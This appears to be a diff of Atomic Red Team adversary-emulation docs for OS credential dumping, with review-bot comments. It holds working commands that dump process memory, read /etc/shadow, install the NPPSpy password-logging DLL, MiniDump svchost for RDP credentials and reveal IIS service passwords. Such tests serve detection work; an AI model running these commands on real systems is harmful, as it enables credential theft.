**auto_generated_guid:** fa37b633-e097-4415-b2b8-c5bf4c86e423
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.007.bin|
| script_path | Path to script generating the target process | path | /tmp/T1003.007.sh|
| pid_term | Unique string to use to identify target process | string | T1003.007|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sh #{script_path}
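Review bot: the success check `grep -i "PASS" "#{output_file}"` at the end of this test searches a raw memory image, and GNU grep responds to a binary file with `Binary file ... matches` rather than printing the match, so the captured password never appears in stdout; the FreeBSD variant of the same test already runs `strings "#{output_file}" | grep -i PASS`, and this one should do the same or use `grep -a`. The `dd if=/proc/"${PID}"/mem ... ibs=1 skip="$MEM_START"` copy also moves the region one byte per read, which is very slow on anything larger than a toy process; with GNU dd, `bs=4096 iflag=skip_bytes,count_bytes` keeps the byte offsets while reading in blocks.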
@@ -101,42 +119,47 @@ dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM
strings "#{output_file}" | grep -i PASS
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm -f "#{output_file}"
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Script to launch target process must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
test -f #{script_path}
grep "#{pid_term}" #{script_path}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
```
### Atomic Test #3: Dump individual process memory with Python (Local)
<br/>
<br/>
## Atomic Test #3 - Dump individual process memory with Python (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
**Supported Platforms:** Linux
**auto_generated_guid:** `437b2003-a20d-4ed8-834c-4964f24eec63`
#### Inputs
**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.007.bin|
@@ -144,7 +167,9 @@ On FreeBSD procfs must be mounted.
| python_script | Path to script generating the target process | path | PathToAtomicsFolder/T1003.007/src/dump_heap.py|
| pid_term | Unique string to use to identify target process | string | T1003.007|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sh #{script_path}
@@ -154,46 +179,42 @@ $PYTHON #{python_script} $PID #{output_file}
grep -i "PASS" "#{output_file}"
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm -f "#{output_file}"
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Script to launch target process must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
test -f #{script_path}
grep "#{pid_term}" #{script_path}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
```
##### Description: Requires Python
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
(which python || which python3 || which python2)
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
echo "Python 2.7+ or 3.4+ must be installed"
```
### Atomic Test #4: Capture Passwords with MimiPenguin
<br/>
<br/>
## Atomic Test #4 - Capture Passwords with MimiPenguin
MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring).
Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file.
See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781.
@@ -201,85 +222,76 @@ See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:
**Supported Platforms:** Linux
**auto_generated_guid:** `a27418de-bdce-4ebd-b655-38f04842bf0c`
#### Inputs
**auto_generated_guid:** a27418de-bdce-4ebd-b655-38f04842bf0c
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.007Test3.txt|
| MimiPenguin_Location | Path of MimiPenguin script | path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sudo #{MimiPenguin_Location} > #{output_file}
cat #{output_file}
```
#### Cleanup Commands
#### Cleanup Commands:
```bash
rm -f #{output_file} > /dev/null
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
mkdir /tmp/mimipenguin
tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
```
##### Description: Strings must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
sudo apt-get -y install binutils
```
##### Description: Python2 must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
sudo apt-get -y install python2
```
##### Description: Libc-bin must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
sudo apt-get -y install libc-bin
```
<br/>
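Review bot: all three tool checks in this hunk pass a stray `--version` to `command -v` (`command -v strings --version`, `command -v python2 --version`, `command -v ldd --version`); `command -v` only resolves names, so `--version` is looked up as a command that does not exist and contributes nothing, and the real test is whether the captured output is an executable path. `if command -v strings >/dev/null 2>&1; then exit 0; else exit 1; fi` (and likewise for `python2` and `ldd`) says what is meant. Separately, `sudo apt-get -y install python2` only works on distributions that still ship a `python2` package, which recent Ubuntu releases no longer do, so the test description should name the distributions it was validated on.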
+12 -15
View File
@@ -1,16 +1,21 @@
#!/usr/bin/env python
'''Dump a process's heap space to disk
Usage:
python dump_proc.py <PID> <filepath>
'''
import argparse
import platform
parser = argparse.ArgumentParser(description='Dump a process\'s heap space to disk')
parser.add_argument('pid', type=int, help='ID of process to dump')
parser.add_argument('filepath', help='A filepath to save output to')
args = parser.parse_args()
process_id = args.pid
output_file = args.filepath
if platform.system() == "Linux":
with open("/proc/{}/maps".format(process_id), "r") as maps_file:
# example: 5566db1a6000-5566db4f0000 rw-p 00000000 00:00 0 [heap]
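Review bot: the usage line in the module docstring names the script `dump_proc.py`, but the file is `dump_heap.py` (the T1003.007 markdown in this same diff references `PathToAtomicsFolder/T1003.007/src/dump_heap.py`), so the docstring should read `python dump_heap.py <PID> <filepath>`. The `#!/usr/bin/env python` shebang also assumes an unversioned `python` on PATH, which the test's own prereq check (`which python || which python3 || which python2`) admits may be absent; the test invokes the script through `$PYTHON`, so this is harmless there, but `#!/usr/bin/env python3` would make the file runnable on its own if Python 2 support is not actually required.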
@@ -20,24 +25,16 @@ if platform.system() == "Linux":
mem_stop = int(heap_range.split('-')[1], 16)
mem_size = mem_stop - mem_start
elif platform.system() == "FreeBSD":
import subprocess
procstat_output = subprocess.check_output(["procstat", "-v", str(process_id)], universal_newlines=True)
heap_line = None
for line in procstat_output.splitlines():
if "rw-" in line and "sw" in line:
heap_line = line
break
if not heap_line:
for line in procstat_output.splitlines():
if "rw-" in line and not (".so" in line or "/lib/" in line):
heap_line = line
break
columns = heap_line.split()
mem_start = int(columns[1], 16)
mem_stop = int(columns[2], 16)
import linecache
mem_line = linecache.getline("/proc/"+str(process_id)+"/map",4)
mem_start = int(mem_line.split(' ')[0], 16)
mem_stop = int(mem_line.split(' ')[1], 16)
mem_size = mem_stop - mem_start
mem_start = mem_stop
with open("/proc/{}/mem".format(process_id), "rb") as mem_file:
mem_file.seek(mem_start, 0)
heap_mem = mem_file.read(mem_size)
with open(output_file, "wb") as ofile:
ofile.write(heap_mem)
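Review bot: the `linecache` form of the FreeBSD branch reads a hard-coded line 4 of `/proc/<pid>/map` with no check that the file has four lines (`linecache.getline` returns `''` in that case, and `int('', 16)` then raises `ValueError`), and the trailing `mem_start = mem_stop` means the script dumps `mem_size` bytes starting at the end of that mapping rather than the mapping itself, which needs at least a comment saying which region that is intended to reach. The `procstat -v` form in the same hunk is the more defensible lookup (it scans for a writable swap-backed region and has a fallback) but has the same gap: when neither loop matches, `heap_line` stays `None` and `heap_line.split()` raises `AttributeError`. Whichever variant is kept, exit with a clear message (`sys.exit("no heap mapping found for pid %d" % process_id)`) instead of a traceback, and add a unit test that feeds a constructed `procstat -v` or `/proc/<pid>/map` sample through the parsing so the region selection is exercised without a live process.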
+107 -42
View File
@@ -1,142 +1,202 @@
# T1003.008 - OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/008)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information, including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
> Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information, including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
>
> Linux stores user information such as user ID, group ID, home directory path, and login shell in <code>/etc/passwd</code>. A "user" on the system may belong to a person or a service. All password hashes are stored in <code>/etc/shadow</code> - including entries for users with no passwords and users with locked or disabled accounts.(Citation: Linux Password and Shadow File Formats)
>
> Adversaries may attempt to read or dump the <code>/etc/passwd</code> and <code>/etc/shadow</code> files on Linux systems via command line utilities such as the <code>cat</code> command.(Citation: Arctic Wolf) Additionally, the Linux utility <code>unshadow</code> can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper - for example, via the command <code>/usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>(Citation: nixCraft - John the Ripper). Since the user information stored in <code>/etc/passwd</code> are linked to the password hashes in <code>/etc/shadow</code>, an adversary would need to have access to both.
Linux stores user information such as user ID, group ID, home directory path, and login shell in <code>/etc/passwd</code>. A "user" on the system may belong to a person or a service. All password hashes are stored in <code>/etc/shadow</code> - including entries for users with no passwords and users with locked or disabled accounts.(Citation: Linux Password and Shadow File Formats)
[Source](https://attack.mitre.org/techniques/T1003/008)
Adversaries may attempt to read or dump the <code>/etc/passwd</code> and <code>/etc/shadow</code> files on Linux systems via command line utilities such as the <code>cat</code> command.(Citation: Arctic Wolf) Additionally, the Linux utility <code>unshadow</code> can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper - for example, via the command <code>/usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>(Citation: nixCraft - John the Ripper). Since the user information stored in <code>/etc/passwd</code> are linked to the password hashes in <code>/etc/shadow</code>, an adversary would need to have access to both.
</blockquote>
## Atomic Tests
- [Atomic Test #1: Access /etc/shadow (Local)](#atomic-test-1-access-etcshadow-local)
- [Atomic Test #2: Access /etc/master.passwd (Local)](#atomic-test-2-access-etcmasterpasswd-local)
- [Atomic Test #3: Access /etc/passwd (Local)](#atomic-test-3-access-etcpasswd-local)
- [Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat](#atomic-test-4-access-etcshadowpasswdmasterpasswd-with-a-standard-bin-thats-not-cat)
- [Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins](#atomic-test-5-access-etcshadowpasswdmasterpasswd-with-shell-builtins)
- [Atomic Test #1 - Access /etc/shadow (Local)](#atomic-test-1---access-etcshadow-local)
### Atomic Test #1: Access /etc/shadow (Local)
- [Atomic Test #2 - Access /etc/master.passwd (Local)](#atomic-test-2---access-etcmasterpasswd-local)
- [Atomic Test #3 - Access /etc/passwd (Local)](#atomic-test-3---access-etcpasswd-local)
- [Atomic Test #4 - Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat](#atomic-test-4---access-etcshadowpasswdmasterpasswd-with-a-standard-bin-thats-not-cat)
- [Atomic Test #5 - Access /etc/{shadow,passwd,master.passwd} with shell builtins](#atomic-test-5---access-etcshadowpasswdmasterpasswd-with-shell-builtins)
<br/>
## Atomic Test #1 - Access /etc/shadow (Local)
/etc/shadow file is accessed in Linux environments
**Supported Platforms:** Linux
**auto_generated_guid:** `3723ab77-c546-403c-8fb4-bb577033b235`
#### Inputs
**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sudo cat /etc/shadow > #{output_file}
cat #{output_file}
```
#### Cleanup Commands
#### Cleanup Commands:
```bash
rm -f #{output_file}
```
### Atomic Test #2: Access /etc/master.passwd (Local)
<br/>
<br/>
## Atomic Test #2 - Access /etc/master.passwd (Local)
/etc/master.passwd file is accessed in FreeBSD environments
**Supported Platforms:** Linux
**auto_generated_guid:** `5076874f-a8e6-4077-8ace-9e5ab54114a5`
#### Inputs
**auto_generated_guid:** 5076874f-a8e6-4077-8ace-9e5ab54114a5
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo cat /etc/master.passwd > #{output_file}
cat #{output_file}
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm -f #{output_file}
```
### Atomic Test #3: Access /etc/passwd (Local)
<br/>
<br/>
## Atomic Test #3 - Access /etc/passwd (Local)
/etc/passwd file is accessed in FreeBSD and Linux environments
**Supported Platforms:** Linux
**auto_generated_guid:** `60e860b6-8ae6-49db-ad07-5e73edd88f5d`
#### Inputs
**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
cat /etc/passwd > #{output_file}
cat #{output_file}
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm -f #{output_file}
```
### Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat
<br/>
<br/>
## Atomic Test #4 - Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed
**Supported Platforms:** Linux
**auto_generated_guid:** `df1a55ae-019d-4120-bc35-94f4bc5c4b0a`
#### Inputs
**auto_generated_guid:** df1a55ae-019d-4120-bc35-94f4bc5c4b0a
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
unamestr=$(uname)
if [ "$unamestr" = 'Linux' ]; then echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; elif [ "$unamestr" = 'FreeBSD' ]; then echo -e "e /etc/passwd\n,p\ne /etc/master.passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}; fi
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm -f #{output_file}
```
### Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins
<br/>
<br/>
## Atomic Test #5 - Access /etc/{shadow,passwd,master.passwd} with shell builtins
Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins
**Supported Platforms:** Linux
**auto_generated_guid:** `f5aa6543-6cb2-4fae-b9c2-b96e14721713`
#### Inputs
**auto_generated_guid:** f5aa6543-6cb2-4fae-b9c2-b96e14721713
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.008.txt|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
testcat(){ (while read line; do echo $line >> #{output_file}; done < $1) }
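Review bot: test 4 in this hunk runs under the `sh` executor but builds its `ed` script with `echo -e`; `echo -e` is not POSIX, and where `/bin/sh` is dash (Debian, Ubuntu) `echo -e "e /etc/passwd\n,p\n..."` emits `-e e /etc/passwd` as the first line, which `ed` rejects, so `/etc/passwd` is silently skipped and only the later `e` commands take effect. Use `printf 'e /etc/passwd\n,p\ne /etc/shadow\n,p\n' | ed > #{output_file}`, which interprets `\n` portably. Test 5's `testcat(){ (while read line; do echo $line >> #{output_file}; done < $1) }` has a related problem: `read` without `-r` consumes backslashes and the unquoted `$line` is subject to word splitting and globbing, so the copy is not guaranteed byte-for-byte; `while IFS= read -r line; do printf '%s\n' "$line"; done` preserves each record exactly.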
@@ -145,8 +205,13 @@ testcat /etc/passwd
testcat /etc/shadow
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm -f #{output_file}
```
<br/>
+149 -67
@@ -1,25 +1,34 @@
# T1003 - OS Credential Dumping
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
> Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
>
> Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
[Source](https://attack.mitre.org/techniques/T1003)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Gsecdump](#atomic-test-1-gsecdump)
- [Atomic Test #2: Credential Dumping with NPPSpy](#atomic-test-2-credential-dumping-with-nppspy)
- [Atomic Test #3: Dump svchost.exe to gather RDP credentials](#atomic-test-3-dump-svchostexe-to-gather-rdp-credentials)
- [Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)](#atomic-test-4-retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-list)
- [Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)](#atomic-test-5-retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-config)
- [Atomic Test #6: Dump Credential Manager using keymgr.dll and rundll32.exe](#atomic-test-6-dump-credential-manager-using-keymgrdll-and-rundll32exe)
- [Atomic Test #7: Send NTLM Hash with RPC Test Connection](#atomic-test-7-send-ntlm-hash-with-rpc-test-connection)
- [Atomic Test #1 - Gsecdump](#atomic-test-1---gsecdump)
### Atomic Test #1: Gsecdump
- [Atomic Test #2 - Credential Dumping with NPPSpy](#atomic-test-2---credential-dumping-with-nppspy)
- [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials)
- [Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)](#atomic-test-4---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-list)
- [Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)](#atomic-test-5---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-config)
- [Atomic Test #6 - Dump Credential Manager using keymgr.dll and rundll32.exe](#atomic-test-6---dump-credential-manager-using-keymgrdll-and-rundll32exe)
- [Atomic Test #7 - Send NTLM Hash with RPC Test Connection](#atomic-test-7---send-ntlm-hash-with-rpc-test-connection)
<br/>
## Atomic Test #1 - Gsecdump
Dump credentials from memory using Gsecdump.
Upon successful execution, you should see domain\username's followed by two 32 character hashes.
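Review bot: the TOC anchors in this hunk change slug format together with the heading text (`#atomic-test-1-gsecdump` for `Atomic Test #1: Gsecdump` versus `#atomic-test-1---gsecdump` for `Atomic Test #1 - Gsecdump`), and each variant is only valid against its own heading style, so whichever template wins, the TOC and the headings must be produced by the same code path or the in-page links break. The ATT&CK description also moves between a raw `<blockquote>` with the link in the heading and a markdown `>` quote followed by a `[Source](…)` line; prefer the markdown form so the description stays plain markdown and the source link survives tools that strip HTML.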
@@ -31,35 +40,38 @@ If you see a message saying "The system cannot find the path specified", try usi
**Supported Platforms:** Windows
**auto_generated_guid:** `96345bfc-8ae7-4b6a-80b7-223200f24ef9`
#### Inputs
**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| gsecdump_exe | Path to the Gsecdump executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;gsecdump.exe|
| gsecdump_bin_hash | File hash of the Gsecdump binary file | string | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
| gsecdump_url | Path to download Gsecdump binary file | url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{gsecdump_exe}" -a
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{gsecdump_exe}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
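Review bot: `Check Prereq Commands` and `Get Prereq Commands` are emitted as h6 (`######`) in one rendering and h5 (`#####`) in the other; at h6 they nest under the h5 `Description:` line instead of sitting beside it, and nothing else in these files uses h6, so keep them at h5 within the `Dependencies` block.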
@@ -69,8 +81,13 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}
}
```
### Atomic Test #2: Credential Dumping with NPPSpy
<br/>
<br/>
## Atomic Test #2 - Credential Dumping with NPPSpy
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
After user's logging in cleartext password is saved in C:\NPPSpy.txt.
Clean up deletes the files and reverses Registry changes.
@@ -78,9 +95,16 @@ NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NP
**Supported Platforms:** Windows
**auto_generated_guid:** `9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
@@ -95,8 +119,7 @@ $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\Netw
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
$cleanupPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$cleanupUpdatedValue = $cleanupPath.PROVIDERORDER
@@ -107,26 +130,28 @@ Remove-Item C:\NPPSpy.txt -ErrorAction Ignore
Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: NPPSpy.dll must be available in ExternalPayloads directory
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll"
```
### Atomic Test #3: Dump svchost.exe to gather RDP credentials
<br/>
<br/>
## Atomic Test #3 - Dump svchost.exe to gather RDP credentials
The svchost.exe contains the RDP plain-text credentials.
Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
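Review bot: the `Get Prereq Commands` in this hunk fetch `NPPSPY.dll` with a plain `Invoke-WebRequest` and no hash check, and the attack step then copies that file into `C:\Windows\System32`, whereas the Gsecdump test above declares a `gsecdump_bin_hash` input and downloads through `Invoke-WebRequestVerifyHash`; the URL is pinned to a commit, which helps, but adding a hash input and using the same verifying helper would make the two tests consistent and stop a substituted DLL from being planted into System32 by the test itself.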
@@ -134,9 +159,16 @@ Upon successful execution, you should see the following file created $env:TEMP\s
**Supported Platforms:** Windows
**auto_generated_guid:** `d400090a-d8ca-4be0-982e-c70598a23de9`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** d400090a-d8ca-4be0-982e-c70598a23de9
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
@@ -144,21 +176,34 @@ if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
```
### Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
<br/>
<br/>
## Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
**Supported Platforms:** Windows
**auto_generated_guid:** `6c7a4fd3-5b0b-4b30-a93e-39411b25d889`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
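Review bot: in the `Attack Commands` at the top of this hunk the fallback branch `else {$id = (Get-Process svchost)[0].Id }` dumps whichever `svchost` instance is listed first when no established TCP 3389 connection exists, and that process will not hold the RDP credentials the description promises; the description (or a comment in the command) should state that without an active RDP session the test only exercises the `comsvcs.dll MiniDump` call, so detection engineers know which behaviour they are validating.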
@@ -167,88 +212,125 @@ C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: IIS must be installed prior to running the test
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Install-WindowsFeature -name Web-Server -IncludeManagementTools
```
### Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
<br/>
<br/>
## Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
**Supported Platforms:** Windows
**auto_generated_guid:** `42510244-5019-48fa-a0e5-66c3b76e6049`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
